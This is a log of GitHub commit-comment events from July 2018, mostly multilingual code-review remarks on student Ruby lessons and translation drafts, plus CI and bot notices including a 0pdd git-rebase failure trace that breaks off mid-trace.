{"id":"7932295629","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629543,"position":27,"line":27,"path":"Lesson3/route.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T12:46:17Z","updated_at":"2018-07-07T12:46:17Z","author_association":"NONE","body":"Тем самым я хочу сказать, что даже, если бы этот код не удалялся, тут имело бы смысл использовать локальную переменную"}},"created_at":"2018-07-07T12:46:17Z"}
{"id":"7932297702","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629547,"position":37,"line":37,"path":"Lesson3/route.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T12:48:02Z","updated_at":"2018-07-07T12:48:02Z","author_association":"NONE","body":"вот тут единственное место, где можно использовать puts. Только когда тут будет ```@stations``` получение имени станции изменится немного"}},"created_at":"2018-07-07T12:48:02Z"}
{"id":"7932299224","type":"CommitCommentEvent","actor":{"login":"lucy201703"},"repo":{"name":"lucy201703/TranslatingForWriting"},"payload":{"comment":{"id":29629548,"position":16,"line":14,"path":"201805-Classic-Style/ch0/ClassicStyleExcerpt.md","commit_id":"6c6162b2307f67623659fe0975a3c0d3a1831e87","created_at":"2018-07-07T12:49:12Z","updated_at":"2018-07-07T12:49:12Z","author_association":"OWNER","body":"阿杰：如果不看英文，只看翻译的这段中文，几乎看不懂在说什么。还需要改为中文习惯的表达。"}},"created_at":"2018-07-07T12:49:12Z"}
{"id":"7932299797","type":"CommitCommentEvent","actor":{"login":"lucy201703"},"repo":{"name":"lucy201703/TranslatingForWriting"},"payload":{"comment":{"id":29629549,"position":21,"line":18,"path":"201805-Classic-Style/ch0/ClassicStyleExcerpt.md","commit_id":"6c6162b2307f67623659fe0975a3c0d3a1831e87","created_at":"2018-07-07T12:49:41Z","updated_at":"2018-07-07T12:49:41Z","author_association":"OWNER","body":"阿杰：同上，太生硬了，能看懂英文，中文反而看着费劲"}},"created_at":"2018-07-07T12:49:41Z"}
{"id":"7932299825","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"collective/collective.ifttt"},"payload":{"comment":{"id":29629550,"position":14,"line":14,"path":"src/collective/ifttt/browser/views.py","commit_id":"990c04b55d008a5046af10cbacc32e0f1506ff54","created_at":"2018-07-07T12:49:43Z","updated_at":"2018-07-07T12:49:43Z","author_association":"COLLABORATOR","body":"That said, you don’t need to try to test every line. That specific condition is probably already tested in plone.app.contentrules."}},"created_at":"2018-07-07T12:49:43Z"}
{"id":"7932300392","type":"CommitCommentEvent","actor":{"login":"lucy201703"},"repo":{"name":"lucy201703/TranslatingForWriting"},"payload":{"comment":{"id":29629552,"position":37,"line":30,"path":"201805-Classic-Style/ch0/ClassicStyleExcerpt.md","commit_id":"6c6162b2307f67623659fe0975a3c0d3a1831e87","created_at":"2018-07-07T12:50:10Z","updated_at":"2018-07-07T12:50:10Z","author_association":"OWNER","body":"阿杰：大家普遍认为，是先出现的思想的精确性导致了古典风格措辞的完美。古典作家直到分析结束，才能准确把握概念差异和概念关系。然后他们才把这种分析的结果（用文字）表达出来。通常这种表达似乎会呈现出像数学公式一样的效果。"}},"created_at":"2018-07-07T12:50:10Z"}
{"id":"7932300772","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629555,"position":4,"line":4,"path":"Lesson3/station.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T12:50:27Z","updated_at":"2018-07-07T12:50:27Z","author_association":"NONE","body":"Это пока не нужно. Мы дойдем до перменных классов и их минусов"}},"created_at":"2018-07-07T12:50:27Z"}
{"id":"7932301175","type":"CommitCommentEvent","actor":{"login":"lucy201703"},"repo":{"name":"lucy201703/TranslatingForWriting"},"payload":{"comment":{"id":29629558,"position":43,"line":34,"path":"201805-Classic-Style/ch0/ClassicStyleExcerpt.md","commit_id":"6c6162b2307f67623659fe0975a3c0d3a1831e87","created_at":"2018-07-07T12:50:45Z","updated_at":"2018-07-07T12:50:45Z","author_association":"OWNER","body":"阿杰：我的理解，这段话，作者用调琴做比喻，是想说，每件乐器，在弹奏之前，要调音，而且每根弦都调到它对应的音准上，而这个音准是不变的（相当于思想）在调之前就存在的。只要调准了，后面自然就能演绎出完美的交响乐了。"}},"created_at":"2018-07-07T12:50:45Z"}
{"id":"7932301204","type":"CommitCommentEvent","actor":{"login":"simaimch"},"repo":{"name":"simaimch/driftingsouls"},"payload":{"comment":{"id":29629559,"position":null,"line":null,"path":null,"commit_id":"4bfa98419b4cb18d20e5e1e83458eca6cfca4880","created_at":"2018-07-07T12:50:47Z","updated_at":"2018-07-07T12:50:47Z","author_association":"OWNER","body":"Ship: imo sollte das Schiff selber ermitteln können, wo es sich befindet, habe die entsprechende Abfrage entsprechend verschoben\r\n\r\nShipIdGenerator: try(st): ant und ich verstehen nicht, was damit gemeint ist... und da ist ja eh schon ein Haufen an trys ;-)\r\n\r\nBeim Rest waren kleine Anpassungen was den Bound Type angeht nötig um den Builder zu befriedigen"}},"created_at":"2018-07-07T12:50:47Z"}
{"id":"7932302792","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629563,"position":6,"line":6,"path":"Lesson3/station.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T12:52:06Z","updated_at":"2018-07-07T12:52:06Z","author_association":"NONE","body":"В инишалайз нет смысле передавать те вещи, которые можно посчитать в методах позже. И в моем представлении \"реального мира\", когда станция строится - там нет поездов."}},"created_at":"2018-07-07T12:52:06Z"}
{"id":"7932303930","type":"CommitCommentEvent","actor":{"login":"GGkas"},"repo":{"name":"GGkas/30-Days-Project"},"payload":{"comment":{"id":29629565,"position":null,"line":null,"path":null,"commit_id":"ad4ae47df24e8bcd8aef06c398cca12092a509b3","created_at":"2018-07-07T12:53:03Z","updated_at":"2018-07-07T12:53:03Z","author_association":"OWNER","body":"na ksereis eida to video pou esteiles, exei kapoia pragmata pou 8a xrieastoume, alla grafei toso apaisia kwdika, h mallon einai poly diaforetiko apo to tutorial"}},"created_at":"2018-07-07T12:53:03Z"}
{"id":"7932304649","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629567,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T12:53:37Z","updated_at":"2018-07-07T12:53:37Z","author_association":"MEMBER","body":"The Route class extends the new one, also in Sensio 3.0:\r\nhttps://github.com/sensiolabs/SensioFrameworkExtraBundle/blob/3.0/Configuration/Route.php#L14\r\n\r\nThe Method class extends nothing, but is only deprecated in favour of specifying the methods directly as part of `@Route` annotation instead of adding a separate `@Method` annotation."}},"created_at":"2018-07-07T12:53:37Z"}
{"id":"7932304827","type":"CommitCommentEvent","actor":{"login":"nabeelomer"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29629570,"position":5,"line":78,"path":"index.html","commit_id":"a2d328326fd6e9f480176f24d07deedb9d621303","created_at":"2018-07-07T12:53:45Z","updated_at":"2018-07-07T12:53:45Z","author_association":"MEMBER","body":"Connoisseur wasn’t suitable? 😑 "}},"created_at":"2018-07-07T12:53:45Z"}
{"id":"7932305831","type":"CommitCommentEvent","actor":{"login":"ekasnh"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29629573,"position":5,"line":78,"path":"index.html","commit_id":"a2d328326fd6e9f480176f24d07deedb9d621303","created_at":"2018-07-07T12:54:34Z","updated_at":"2018-07-07T12:54:34Z","author_association":"CONTRIBUTOR","body":"I am not an expert on those topics so..."}},"created_at":"2018-07-07T12:54:34Z"}
{"id":"7932307838","type":"CommitCommentEvent","actor":{"login":"CodeDANY"},"repo":{"name":"biochemistry43/sysChurch"},"payload":{"comment":{"id":29629575,"position":null,"line":null,"path":null,"commit_id":"f55a514d28d4346a356d7d2c6622c64a9d7b58e3","created_at":"2018-07-07T12:56:17Z","updated_at":"2018-07-07T12:56:17Z","author_association":"COLLABORATOR","body":"oh que horror jaja no borré los archivos de ayuda y el html del xml para la vista previa."}},"created_at":"2018-07-07T12:56:17Z"}
{"id":"7932308342","type":"CommitCommentEvent","actor":{"login":"nabeelomer"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29629576,"position":5,"line":78,"path":"index.html","commit_id":"a2d328326fd6e9f480176f24d07deedb9d621303","created_at":"2018-07-07T12:56:44Z","updated_at":"2018-07-07T12:56:44Z","author_association":"MEMBER","body":"Of course. 😒 "}},"created_at":"2018-07-07T12:56:44Z"}
{"id":"7932310034","type":"CommitCommentEvent","actor":{"login":"ekasnh"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29629578,"position":5,"line":78,"path":"index.html","commit_id":"a2d328326fd6e9f480176f24d07deedb9d621303","created_at":"2018-07-07T12:58:04Z","updated_at":"2018-07-07T12:58:04Z","author_association":"MEMBER","body":"hmm? 🤔 "}},"created_at":"2018-07-07T12:58:04Z"}
{"id":"7932311937","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29629584,"position":null,"line":null,"path":null,"commit_id":"daee6d90daea16d4543b9d7c00a63eaaa695891f","created_at":"2018-07-07T12:59:40Z","updated_at":"2018-07-07T12:59:40Z","author_association":"COLLABORATOR","body":"Puzzle `360-e326c5ed` discovered in   [`shopelectro/tests/tests_selenium.py`](  https://github.com/fidals/shopelectro/blob/master/shopelectro/tests/tests_selenium.py)   and submitted as #405. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-07T12:59:40Z"}
{"id":"7932311988","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29629585,"position":null,"line":null,"path":null,"commit_id":"daee6d90daea16d4543b9d7c00a63eaaa695891f","created_at":"2018-07-07T12:59:43Z","updated_at":"2018-07-07T12:59:43Z","author_association":"COLLABORATOR","body":"Puzzle `360-cd212ec2` discovered in   [`shopelectro/tests/tests_selenium.py`](  https://github.com/fidals/shopelectro/blob/master/shopelectro/tests/tests_selenium.py)   and submitted as #406. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-07T12:59:43Z"}
{"id":"7932312055","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29629586,"position":null,"line":null,"path":null,"commit_id":"daee6d90daea16d4543b9d7c00a63eaaa695891f","created_at":"2018-07-07T12:59:46Z","updated_at":"2018-07-07T12:59:46Z","author_association":"COLLABORATOR","body":"Puzzle `360-25169cf6` discovered in   [`shopelectro/tests/tests_views.py`](  https://github.com/fidals/shopelectro/blob/master/shopelectro/tests/tests_views.py)   and submitted as #407. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-07T12:59:46Z"}
{"id":"7932312940","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629588,"position":9,"line":9,"path":"Lesson3/station.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:00:19Z","updated_at":"2018-07-07T13:00:19Z","author_association":"NONE","body":"Тут по аналогу с маршрутом мы хотим видеть массив ``` @trains ```. Массив более конвенциональный способ хранения объектов. Это значительно упростит работу с поездами в дальнейшем. "}},"created_at":"2018-07-07T13:00:19Z"}
{"id":"7932317659","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/turbodbc-feedstock"},"payload":{"comment":{"id":29629595,"position":null,"line":null,"path":null,"commit_id":"92a80a0bc215209d7d3d9fdd6a8f0e412800f909","created_at":"2018-07-07T13:03:49Z","updated_at":"2018-07-07T13:03:49Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mathmagique were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @mathmagique were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-07T13:03:49Z"}
{"id":"7932317955","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629596,"position":17,"line":17,"path":"Lesson3/station.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:04:04Z","updated_at":"2018-07-07T13:04:04Z","author_association":"NONE","body":"Тут ты фактический конвертировал объект поезд в хэш. Как результат - на этом хэше не будет работать ни один из методов определенных в классе Train. Работаем с объектами"}},"created_at":"2018-07-07T13:04:04Z"}
{"id":"7932318051","type":"CommitCommentEvent","actor":{"login":"habib-ullah"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29629597,"position":null,"line":null,"path":null,"commit_id":"952710d08e817861e515139549a9d840e7afb086","created_at":"2018-07-07T13:04:08Z","updated_at":"2018-07-07T13:04:08Z","author_association":"NONE","body":"Yeah! It worked."}},"created_at":"2018-07-07T13:04:08Z"}
{"id":"7932319217","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629598,"position":null,"line":null,"path":null,"commit_id":"a72e4454c3031860290fc119785945eb62ec2c9c","created_at":"2018-07-07T13:05:00Z","updated_at":"2018-07-07T13:05:00Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T13:05:00Z"}
{"id":"7932319614","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629599,"position":18,"line":18,"path":"Lesson3/station.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:05:20Z","updated_at":"2018-07-07T13:05:20Z","author_association":"NONE","body":"Хранить отдельно счетчик может привести к непостоянству данных. Лучше написать отдельный метод, который в теле будет считать кол-во элементов в массиве ```@trains```"}},"created_at":"2018-07-07T13:05:20Z"}
{"id":"7932320225","type":"CommitCommentEvent","actor":{"login":"akath20"},"repo":{"name":"rit-sse/sse-eos"},"payload":{"comment":{"id":29629600,"position":null,"line":null,"path":null,"commit_id":"d5591cfde4be86a8333a472626f378bf922a2d5d","created_at":"2018-07-07T13:05:55Z","updated_at":"2018-07-07T13:05:55Z","author_association":"MEMBER","body":"Was this making the config invalid and therefore unable to redeploy? "}},"created_at":"2018-07-07T13:05:55Z"}
{"id":"7932321229","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29629601,"position":20,"line":20,"path":"src/main/java/com/agurova/dal/impl/ImageRepositoryImpl.java","commit_id":"6276d98ec3bb2e3f58b39fd1729961f7b4529aca","created_at":"2018-07-07T13:06:43Z","updated_at":"2018-07-07T13:06:43Z","author_association":"COLLABORATOR","body":"Нужно закрыть сессию после окончания работы."}},"created_at":"2018-07-07T13:06:43Z"}
{"id":"7932322422","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":29629602,"position":11,"line":754,"path":"compiler/src/dotty/tools/dotc/typer/Namer.scala","commit_id":"0c35b8f1b132da60fe07c866ef7b63e25b17e775","created_at":"2018-07-07T13:07:40Z","updated_at":"2018-07-07T13:07:40Z","author_association":"MEMBER","body":"I think this needs to be `implicit ctx => typedAnnotation(annotTree)(annotContext(original, sym))`"}},"created_at":"2018-07-07T13:07:40Z"}
{"id":"7932322605","type":"CommitCommentEvent","actor":{"login":"gthomas2"},"repo":{"name":"moodlerooms/moodle-tool_ally"},"payload":{"comment":{"id":29629603,"position":12,"line":134,"path":"classes/local_content.php","commit_id":"055567ab0c74dd156ee26f5bd328b466b435292c","created_at":"2018-07-07T13:07:50Z","updated_at":"2018-07-07T13:07:50Z","author_association":"CONTRIBUTOR","body":"No worries."}},"created_at":"2018-07-07T13:07:50Z"}
{"id":"7932323660","type":"CommitCommentEvent","actor":{"login":"katekost"},"repo":{"name":"katekost/GeolocationByIP"},"payload":{"comment":{"id":29629605,"position":null,"line":null,"path":null,"commit_id":"5233d3d62fa5fd2018115ff7ca05c11902aaf614","created_at":"2018-07-07T13:08:40Z","updated_at":"2018-07-07T13:08:40Z","author_association":"OWNER","body":"Simple script for detecting country by IP-address using GeoLite2-Country base. In result you have .csv file with country for each IP."}},"created_at":"2018-07-07T13:08:40Z"}
{"id":"7932323799","type":"CommitCommentEvent","actor":{"login":"horacekj"},"repo":{"name":"kmzbrnoI/station-announcement"},"payload":{"comment":{"id":29629606,"position":40,"line":101,"path":"tcp_connection_manager.py","commit_id":"7f119ba1584542f5a7c912848da8042a40a8ac2e","created_at":"2018-07-07T13:08:47Z","updated_at":"2018-07-07T13:08:47Z","author_association":"MEMBER","body":"@PetrRepa Můžeš mi vysvětlit význam tohoto kódu? Proč může být `message` `None`? A k čemu je `TCPCommunicationEstablishedError`?"}},"created_at":"2018-07-07T13:08:47Z"}
{"id":"7932325522","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629613,"position":null,"line":null,"path":null,"commit_id":"a72e4454c3031860290fc119785945eb62ec2c9c","created_at":"2018-07-07T13:10:06Z","updated_at":"2018-07-07T13:10:06Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T13:10:06Z"}
{"id":"7932325984","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629614,"position":25,"line":25,"path":"Lesson3/station.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:10:28Z","updated_at":"2018-07-07T13:10:28Z","author_association":"NONE","body":"Не лучшее название метода. Я понимаю, что ты назвал по аналогии с отправкой писем, когда письмо \"форваридтся\", но это подразумевает, что оно \"форвардится\" на другой адрес, и логический ожидаешь следующий адресс аргументом. Тут же аргументом приходит поезд (следующим адресом была бы станция). Даже #send_train лучше отразит, что должно произойти в методе"}},"created_at":"2018-07-07T13:10:28Z"}
{"id":"7932328285","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629617,"position":37,"line":37,"path":"Lesson3/station.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:12:22Z","updated_at":"2018-07-07T13:12:22Z","author_association":"NONE","body":"Если count равен нулю, то each просто ничего не сделает. Избыточная проверка"}},"created_at":"2018-07-07T13:12:22Z"}
{"id":"7932330422","type":"CommitCommentEvent","actor":{"login":"billdybas"},"repo":{"name":"rit-sse/sse-eos"},"payload":{"comment":{"id":29629618,"position":null,"line":null,"path":null,"commit_id":"d5591cfde4be86a8333a472626f378bf922a2d5d","created_at":"2018-07-07T13:14:08Z","updated_at":"2018-07-07T13:14:08Z","author_association":"MEMBER","body":"Not sure. Was looking through logs and saw a deprecation notice for this.\r\n\r\nI think though [this](https://github.com/rit-sse/sse-eos/commit/5be44efcb50656104a735620f1a8202c6a49014d#diff-a96727c8be43a3590a8471bb79e3ba42R14) was causing the issue. I saw a related error in the logs, so I think when the load balancer container was trying to restart, it didn't know how it should contact Let's Encrypt, so it failed to start."}},"created_at":"2018-07-07T13:14:08Z"}
{"id":"7932330820","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629619,"position":47,"line":47,"path":"Lesson3/station.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:14:25Z","updated_at":"2018-07-07T13:14:25Z","author_association":"NONE","body":"Когда ты начнешь пользоваться объектами имплементация этого метода полностью изменится. Но сразу подскажу, что тут должен приходить аргументом type. И можно использовать метод select массива, что-б выбрать что-то по атрибуту"}},"created_at":"2018-07-07T13:14:25Z"}
{"id":"7932331186","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29629621,"position":null,"line":null,"path":null,"commit_id":"f5c76c4e9c628d194389c2af73ac585ee5827ee0","created_at":"2018-07-07T13:14:42Z","updated_at":"2018-07-07T13:14:42Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180707-4-6ujxqw/fidals/stroyprombeton && git config --local core.autocrlf false && git reset origin/master --hard --quiet && git clean --force -d && git fetch --quiet && git checkout master && git rebase --abort || true && git stash && git...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nExec::Error\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180707-4-6ujxqw/fidals/stroyprombeton && git config --local core.autocrlf false && git reset origin/master --hard --quiet && git clean --force -d && git fetch --quiet && git checkout master && git rebase --abort || true && git stash && git rebase --strategy-option=theirs origin/master [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180707-4-6ujxqw/fidals/stroyprombeton\n+ git config --local core.autocrlf false\n+ git reset origin/master --hard --quiet\n+ git clean --force -d\n+ git fetch --quiet\n+ git checkout master\nAlready on 'master'\n+ git rebase --abort\nNo rebase in progress?\n+ true\n+ git stash\n+ git rebase --strategy-option=theirs origin/master\nfatal: Could not parse object 'fe47adf71cbca22933d72ef618dcb3fc5ce634fa^'\nUnknown exit code (128) from command: git-merge-recursive fe47adf71cbca22933d72ef618dcb3fc5ce634fa^ -- HEAD fe47adf71cbca22933d72ef618dcb3fc5ce634fa\n\nYour branch and 'origin/master' have diverged,\nand have 1 and 247 different commits each, respectively.\n  (use \"git pull\" to merge the remote branch into yours)\nNo local changes to save\nFirst, rewinding head to replay your work on top of it...\n\n/app/objects/exec.rb:60:in `block (2 levels) in run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/open3.rb:205:in `popen_run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/open3.rb:95:in `popen3'\n/app/objects/exec.rb:54:in `block in run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/timeout.rb:91:in `block in timeout'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/timeout.rb:33:in `block in catch'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/timeout.rb:33:in `catch'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/timeout.rb:33:in `catch'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/timeout.rb:106:in `timeout'\n/app/objects/exec.rb:53:in `run'\n/app/objects/git_repo.rb:111:in `pull'\n/app/objects/git_repo.rb:75:in `push'\n/app/objects/job.rb:36:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in 